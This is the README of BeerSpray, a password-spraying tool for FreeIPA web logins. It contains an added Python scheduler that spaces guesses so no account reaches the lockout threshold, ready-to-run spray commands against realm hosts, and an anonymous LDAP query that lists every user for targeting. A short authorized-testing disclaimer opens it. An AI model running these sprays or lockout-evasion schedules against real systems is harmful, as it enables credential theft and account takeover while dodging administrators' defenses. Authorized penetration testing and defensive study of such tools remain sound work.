A simple password spraying tool for FreeIPA web interface authentication (UI).
This tool is provided for educational and authorized security testing purposes only. The author is not responsible for any misuse of this software. Users are responsible for ensuring they have proper authorization before using this tool against any systems.
ACCOUNT LOCKOUT RISK: This tool can trigger account lockouts if used aggressively. FreeIPA's default global password policy:
- Max failures: 6 consecutive failed attempts lock the account
- Failure reset interval: 60 seconds (the failure counter resets once 60s have passed since the last failed attempt)
- Lockout duration: 600 seconds (10 minutes), after which the account unlocks automatically
RECOMMENDATIONS:
- Use a delay of 61+ seconds between attempts against the same user (the default --delay) so the failure counter has reset before the next attempt.
- Or keep attempts to 5 or fewer per user within any 60-second window (for example --tries 5 with a short delay) so the counter never reaches 6.
- If an account gets locked under the default policy, wait 10 minutes and it unlocks by itself. Treat every lockout as a noisy event: it is visible to the administrator.
- The values above are only defaults. Administrators tighten them, and FreeIPA also supports per-group password policies that override the global one. If you have any account on the target, check the real values with `ipa pwpolicy-show` before spraying.
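The scheduling the recommendations above describe, written out as an added Python example that is not part of BeerSpray: it models the three policy values listed (max failures, failure reset interval, lockout duration), tracks the failure counter per user the way the server does, keeps every user one failure below the lockout threshold, and plans a full user-list x password-list spray on a simulated clock. It goes a step beyond a flat --delay by tracking each user separately, so a short delay is still safe as long as consecutive attempts land on different users. User names, passwords and the policy values are constructed sample input; treating the reset interval as a strict "greater than" comparison is an assumption, covered by the extra second the README's 61-second default also uses.

```python
"""Lockout-aware spray scheduling against FreeIPA's default password policy.

Added example, not BeerSpray's own code. Simulated clock only; nothing here
talks to a FreeIPA server.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    """FreeIPA global_policy defaults as stated in the README (seconds)."""
    max_failures: int = 6
    failure_reset_interval: float = 60.0
    lockout_duration: float = 600.0


@dataclass
class UserState:
    failures: int = 0                   # consecutive failures the server still counts
    last_failure: Optional[float] = None


class SprayScheduler:
    """Tracks per-user failure counters like FreeIPA does and keeps every user
    at least `safety_margin` failures below the lockout threshold."""

    def __init__(self, policy: LockoutPolicy = LockoutPolicy(), safety_margin: int = 1):
        self.policy = policy
        self.budget = policy.max_failures - safety_margin   # failures allowed per window
        self.states: Dict[str, UserState] = {}

    def _counted_failures(self, st: UserState, now: float) -> int:
        # The server forgets the counter once the reset interval has elapsed since
        # the last failure. Assumption: strict ">" (the +1 s in wait_before covers "=").
        if st.last_failure is None or now - st.last_failure > self.policy.failure_reset_interval:
            return 0
        return st.failures

    def wait_before(self, user: str, now: float) -> float:
        """Seconds to wait before another failed attempt on `user` is safe (0.0 = go now)."""
        st = self.states.setdefault(user, UserState())
        if self._counted_failures(st, now) < self.budget:
            return 0.0
        reset_at = st.last_failure + self.policy.failure_reset_interval + 1.0
        return max(0.0, reset_at - now)

    def record_failure(self, user: str, now: float) -> None:
        st = self.states.setdefault(user, UserState())
        st.failures = self._counted_failures(st, now) + 1
        st.last_failure = now

    def record_success(self, user: str) -> None:
        # A correct password resets the counter; stop spraying this user anyway.
        self.states.pop(user, None)


Attempt = Tuple[float, str, str]   # (seconds since start, user, password)


def plan_spray(users: List[str], passwords: List[str],
               policy: LockoutPolicy = LockoutPolicy(), safety_margin: int = 1) -> List[Attempt]:
    """Schedule every (user, password) pair assuming every attempt fails, the
    worst case for lockouts. Passwords are the outer loop so failures are spread
    across users instead of piled onto one account."""
    sched = SprayScheduler(policy, safety_margin)
    now = 0.0
    plan: List[Attempt] = []
    for pw in passwords:
        for user in users:
            now += sched.wait_before(user, now)
            plan.append((now, user, pw))
            sched.record_failure(user, now)
    return plan


def peak_counter(plan: List[Attempt], policy: LockoutPolicy = LockoutPolicy()) -> int:
    """Replay a plan through FreeIPA's counter semantics and return the highest
    failure count any single user reaches. It must stay below policy.max_failures."""
    peak = 0
    last: Dict[str, Tuple[float, int]] = {}
    for t, user, _ in sorted(plan):
        prev = last.get(user)
        count = 1 if prev is None or t - prev[0] > policy.failure_reset_interval else prev[1] + 1
        last[user] = (t, count)
        peak = max(peak, count)
    return peak


if __name__ == "__main__":
    # Constructed sample input: three users, seven candidate passwords.
    plan = plan_spray(["alice", "bob", "carol"],
                      ["Winter2024!", "Spring2024!", "Summer2024!", "Autumn2024!",
                       "Password1", "Welcome1", "qazwsx123"])
    for t, user, pw in plan:
        print(f"t+{t:5.0f}s  {user:6s}  {pw}")
    print("peak failure counter:", peak_counter(plan))
```

With the default policy and a margin of one, each user takes five passwords immediately and the remaining two after a 61-second pause; the replay confirms no user's counter ever passes 5. Tightening the policy to three failures stretches the same seven passwords over three pauses, which is the kind of thing worth knowing before a long run against a hardened realm.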
FEATURES:
- Password spraying against the FreeIPA web UI
- Support for single username or username list from file
- Support for single password or password list from file
- Configurable delays and timeouts
- Detailed logging and progress tracking
- CSRF token handling
- Session management
REQUIREMENTS:
- Python 3.6+
- pip
INSTALLATION:

```shell
git clone https://github.com/sickwell/BeerSpray
cd BeerSpray
pip3 install --user -r requirements.txt
```

Or inside a virtual environment:

```shell
python3 -m venv beerspray_env
source beerspray_env/bin/activate   # On Windows: beerspray_env\Scripts\activate
pip install -r requirements.txt
```

USAGE:

Single user, password list:

```shell
python3 beerspray.py --url https://dc1.legion.realm --username admin --passwordlist passwords.txt
```

Single user, single password:

```shell
python3 beerspray.py --url https://dc1.legion.realm --username admin --password "password123"
```

User list, single password (the classic spray):

```shell
python3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --password "password123"
```

User list, password list:

```shell
python3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --passwordlist passwords.txt
```

Custom delay between attempts (30s is inside the 60s reset window, so consecutive attempts on the same user still accumulate; pair a short delay with --tries 5 or fewer):

```shell
python3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --passwordlist passwords.txt --delay 30
```

Limit the number of passwords tried per user:

```shell
python3 beerspray.py --url https://dc1.legion.realm --username admin --passwordlist passwords.txt --tries 2
```

One password, one try per user:

```shell
python3 beerspray.py --url https://ipa.freeipadc.lab --userlist test_users.txt --password qazwsx123 --tries 1
```

Here's an example of the beerspray.py script successfully finding a password:
USER ENUMERATION:

By default, you can get a list of usernames without authentication using LDAP:

```shell
ldapsearch -x -H ldap://10.200.0.6 -b "dc=legion,dc=realm" "(uid=*)" uid
```

This command returns all user IDs from the FreeIPA LDAP directory over an anonymous simple bind (`-x` with no credentials). The base DN is the domain-component form of the realm (here legion.realm). It relies on anonymous LDAP access being enabled, which is the FreeIPA default but can be switched off by the administrator; if the query returns nothing, that is the first thing to suspect.
OPTIONS:
- --url: FreeIPA web interface URL (required)
- --username: Single username to test
- --userlist: File containing a list of usernames (one per line)
- --password: Single password to test
- --passwordlist: File containing a list of passwords (one per line)
- --delay: Delay between attempts in seconds (default: 61, chosen to let FreeIPA's 60-second failure counter reset)
- --max-retries: Maximum number of retries per attempt on connection errors (default: 3)
- --tries: Maximum number of passwords to try per user (default: all passwords)
- --verify-ssl: Enable SSL certificate verification (off by default)
- --output: File to save results to
This project is licensed under the MIT License - see the LICENSE file for details.
